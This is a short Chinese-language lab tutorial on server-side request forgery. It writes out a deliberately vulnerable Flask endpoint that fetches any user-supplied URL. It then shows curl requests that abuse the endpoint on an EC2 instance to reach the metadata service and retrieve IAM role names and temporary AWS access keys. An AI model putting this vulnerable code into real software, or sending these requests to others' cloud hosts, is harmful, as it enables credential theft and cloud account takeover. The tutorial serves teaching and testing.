寫一個簡單的SSRF漏洞

from flask import Flask, request
import requests

app = Flask(__name__)


@app.route("/index")     # 127.0.0.1/8000/index?url={URL}
def follow_url():
    url = request.args.get("url", "")
    if url:
        return requests.get(url).text

    return "no url parameter provided"


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

把這份含有SSRF漏洞的Web應用程式丟到EC2上面執行，因為是測試用直接python3 {執行檔}就好了，就不設定瀏覽器服務。

取得Instance MetaService Credential

雖然IMDS僅在實例內部可用，不能通過網絡從外部訪問。但是透過SSRF漏洞可以執行外部訪問IMDS憑證

查詢EC2 instance 是否有關聯的IAM role

Request

curl /index?url=http://169.254.169.254/latest/meta-data/iam

Output

info security-credentials/

確定有關聯的IAM role

返回與Credential關聯的IAM role名稱

Request

curl http://ec2-54-156-95-23.compute-1.amazonaws.com:12345/index?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Output

role name

如果是在自己架設的環境測試的話，可以進到EC2 -> 執行個體 -> 執行個體詳細資訊中查看輸出是否跟IAM 角色相符

檢索Credential

Request

curl http://ec2-54-156-95-23.compute-1.amazonaws.com:12345/index?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/{role name}

Output
大概會長這樣

{ "Code" : "Success", "LastUpdated" : "Date", "Type" : "AWS-HMAC", "AccessKeyId" : "XXXXXXXXXXXX", "SecretAccessKey" : "XXXXXXXX", "Token" : "XXXXXXXX", "Expiration" : "Date" }